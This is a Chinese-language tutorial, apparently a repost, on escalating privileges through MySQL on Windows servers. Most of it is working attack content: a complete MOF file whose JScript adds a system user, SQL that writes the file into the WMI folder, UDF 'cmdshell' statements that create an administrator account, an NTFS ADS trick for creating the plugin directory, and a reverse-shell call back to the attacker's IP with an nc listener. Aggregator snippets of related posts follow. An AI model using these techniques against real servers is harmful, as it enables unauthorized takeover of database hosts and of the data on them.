2. 程式人生 > >mysql提權總結

mysql提權總結

阿新 發佈:2018-05-31
name sed class targe ads ring font 自己 com

一、mof提權

  windows管理規範提供了以下三種方法編譯到WMI存儲庫的托管對象格式(MOF)文件:

  1、運行MOF文件指定為命令行參數講Mofcomp.exe文件。

  2、使用IMofCompiler接口和$CompileFile方法。

  3、拖放到%SystemRoot%\System32\Wbem\MOF文件夾的MOF文件。

  Micrsoft建議您到存儲庫編譯MOF文件使用前兩種方法。也就是運行Mofcomp.exe文件或使用IMofCompiler:CompileFile方法。

  第三種方法僅為後兼容性與早期版本的WMI提供,並因為此功能可能不會提供在將來的版本。

  具體到mysql提權中,我們該怎麽利用?

  1、找一個可寫目錄上傳mof文件,這裏我們上傳到了C:/wmpub/nullevt.mof,代碼如下:

   其中第18行,上傳前請自己更改。

 1 #pragma namespace("\\\\.\\root\\subscription")
 2 
 3 instance of __EventFilter as $EventFilter
 4 {
 5     EventNamespace = "Root\\Cimv2";
 6     Name  = "filtP2";
 7     Query = "Select * From __InstanceModificationEvent 
 
"
 8             "Where TargetInstance Isa \"Win32_LocalTime\" "
 9             "And TargetInstance.Second = 5";
10     QueryLanguage = "WQL";
11 };
12 
13 instance of ActiveScriptEventConsumer as $Consumer
14 {
15     Name = "consPCSV2";
16     ScriptingEngine = "JScript";
17     ScriptText =
18     "
 
var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
19 };
20 
21 instance of __FilterToConsumerBinding
22 {
23     Consumer   = $Consumer;
24     Filter = $EventFilter;
25 };

  2、執行load_file及into dumpfile把文件導出到正確的位置即可。

   1 select load_file(C:/wmpub/nullevt.mof) into dumpfile c:/windows/system32/wbem/mof/nullevt.mof

  執行成功後,即可添加一個普通用戶,然後可以更改命令,再上傳導出執行把用戶提升到管理員權限,然後3389連接就可以了。

二、利用UDF提權

  udf提權也是最常見的提權方式。但是往往再執行過程中老是遇到"Can‘t open shared library"的情況,這裏可以利用NTFS ADS流來解決這個問題。

  1、最常見的是直接使用udf.php此類的工具來執行udf提權。

  連接mysql以後,先導出udf.dll到c:\windows\system32目錄下。

  2、創建相應的函數並執行命令,具體如下:

1 create function cmdshell returns string soname udf.dll;
2 select cmdshell(net user waitalone waitalone.cn /add);
3 select cmdshell(net localgroup administrators waitalone /add);
4 drop function cmdshell; 刪除函數
5 delete from mysql.func where name=cmdshell  刪除函數

  3、某些情況下,我們會遇到Can‘t open shared library的情況,這時就需要我們把udf.dll導出到lib\plugin目錄下才可以,但是默默情況下

  plugin不存在,怎麽辦?還好有大牛研究出利用NTFS ADS流來創建文件夾的方法:

select @@basedir;   
//查找到mysql的目錄
select It is dll into dumpfile C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION;   
//利用NTFS ADS創建lib目錄
select It is dll into dumpfile C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION;
//利用NTFS ADS創建plugin目錄

  執行成功以後再進行導出即可。

三、反彈端口連接提權

  假設我們掃到一個mysql的root弱密碼,並且可以外連,但是服務器上面的網站又無法getshell,這時我們怎麽辦?

  1、利用mysql客戶端工具連接mysql服務器,然後執行下面的操作。(mysql.txt暫時沒有)

mysql.exe -h 172.16.10.11 -uroot -p
Enter password:
mysql> \. c:\mysql.txt
mysql>select backshell("YourIP",2010);

  2、本地監聽你反彈的端口

  nc.exe -vv -l -p 2010

  成功後,你將獲得一個system權限的cmdshell,其實這個也是利用UFDF提權。

mysql提權總結

相關推薦

mysql總結

name sed class targe ads ring font 自己 com 一、mof提權   windows管理規範提供了以下三種方法編譯到WMI存儲庫的托管對象格式(MOF)文件:   1、運行MOF文件指定為命令行參數講Mofcomp.exe文件。   2、使

mysql 總結

替換 sum program binding object namespace ret lec soname 1.MOF提權 簡單的說mof就是系統內部的一個程序,每隔一定時間系統就會以root權限去執行,我們將其替換然後執行我們的而已攻擊代碼。此舉稱之為mof提權。

系列(一)----Windows Service 伺服器初識與exp,mysql

一、初識提權 很多時候我們入侵一個網站的時候,想要的是得到這個伺服器的許可權,也就是admin許可權,但是一般預設得到的是普通用的地許可權,許可權很小,所以就要通過其他手段,提升自己的許可權。 提權是將伺服器的普通使用者提升為管理員使用者的一種操作,提權常常用於輔助旁註

web總結

【 web提權 】 1.能不能執行cmd就看這個命令:net user,net不行就用net1,再不行就上傳一個net到可寫可讀目錄,執行/c c:\windows\temp\cookies\net1.exe user 2.當提權成功,3389沒開的情況下,上傳開3389的

MySQL

一、Mysql提權必備條件1.伺服器安裝Mysql資料庫利用Mysql提權的前提就是伺服器安裝了mysql資料庫,且mysql的服務沒有降權,Mysql資料庫預設安裝是以系統許可權繼承的,並且需要獲取Mysql root賬號密碼。2.判斷Mysql服務執行許可權對於Mysql

大牛總結的LinuxExp合集

1.8 rds 5.4 msr cap before notify dep dbus https://github.com/SecWiki/linux-kernel-exploits #CVE  #Description  #Kernels CVE-2017-10

mysql常用的方法

tro pil pac 托管 建議 wsh mod sel ebs 一,利用MOF提權 Windows 管理規範 (WMI) 提供了以下三種方法編譯到 WMI 存儲庫的托管對象格式 (MOF) 文件: 方法 1: 運行 MOF 文件指定為命令行參數將 Mofcomp.exe

security 01: Linux基本防護 、 用戶切換與 、 SSH訪問控制 、 總結和答疑

add orm ati sgi star 數字簽名 安全 roo 輸入 LINUX安全與監控 6天LINUX安全 3天LINUX監控 3天+++++++++++++++++++++++++什麽安全? 保護維護的服務器不受到攻擊和破壞 攻擊和破壞手段? 技術性非技術

MySQL的system命令在滲透測試中的使用以及UDF

style data erro 重新 pos empty linux類 directory 意思 一、MySQL中的system命令 在MySQL 5.x中增加了system命令,簡單的符號是\!,從而使MySQL可以執行系統的命令 1 mysql> system

MySQL UDF獲取主機控制權

安裝 系統 .py 執行 dex udf 操作 接口 use UDF(User defined function)是MySQL的一個拓展接口,用來擴展MySQL的功能。在具備MySQL管理員訪問權限的條件下,可利用該特性進行提權,獲取所在主機的控制權。下面以windows主

基礎-----mysql-udf

paths 導出 table ads local sele 代碼 更新 reat 1.總結關於udf提權方法 通過弱口令,爆破,網站配置文件等方式得到mysql數據庫帳號密碼,---還要能外連 (1).將udf.dll代碼的16進制數聲明給my_udf_a變量 set @m

【10.20總結】一個漏洞提交頁面的漏洞

!!!寫完之後網頁崩潰了,然後草稿找回的內容還不對!!! Write-up地址:Add comment on a private Oculus Developer bug report  漏洞起源於作者Sarmad Hassan (Juba Baghdad)對Oculus網站漏洞(非安全漏洞

利用mysql的幾種方式

利用mysql的幾種提權方式 mof提權 1.原理 在windows平臺下,c:/windows/system32/wbem/mof/nullevt.mof這個檔案會每間隔一段時間(很短暫)就會以system許可權執行一次,所以,只要我們將我們先要做的事通過程式碼儲存到這個mo

21. 從一道CTF靶機來學習mysql-udf

這次測試的靶機為 Raven: 2 這裡是CTF解題視訊地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶機主要學習 PHPMailer 跟 mymql 的UDF提權。 掃描網站目錄發現,還是wordpress搭建的,嘗試使用wp

mysql資料庫反彈埠連線

Mysql資料庫反彈埠連線提權 在滲透或者安全評估時,有可能遇到一些比較奇葩的環境,即使通過Mysql root賬號和密碼獲取了webshell,由於無法執行命令,在一般的情況下,也就放棄了,但其實可以換一種思路,通過mysql查詢來直接提權,可以針對以下場景: (1)通過網站無法獲取webshel

Mysql Trigger (可以用作

0x00 什麼是觸發器 觸發器(trigger)是資料庫提供給程式設計師和資料分析員來保證資料完整性的一種方法,它是與表事件相關的特殊的儲存過程,它的執行不是由程式呼叫,也不是手工啟動,而是由事件來觸發,當對一個表進行操作(insert,delete,update)時就會啟

各種、滲透經驗技巧總結大全(下)

liunx 相關提權滲透技巧總結,一、ldap 滲透技巧: 1.cat /etc/nsswitch 看看密碼登入策略我們可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=

webshell拿伺服器方法總結

今天有朋友希望更新一些關於提權的一些文章,加上小殘今天有時間所以在這裡為大家講解下本人的一般拿到webshell的提權思路把。 1.我相信很多朋友剛拿到webshell以後都會嘗試是否能執行CMD命令,如果可以執行CMD的話我相信能給提權拿伺服器省去很多時間。

windows方法總結

config bsp inf 端口 本地 系統 ftp 目錄 巴西 windwos提權方法分為兩大塊: 一、系統漏洞 二、第三方軟件漏洞 系統信息泄露和配置不當都可能導致系統被入侵,下面總結是一些常用的windows提權方式。 1

Mysql UDF方法

##0x01 UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫,就像呼叫本機函式一樣。 ##0x02 windows下udf提權的條件 - 如果mys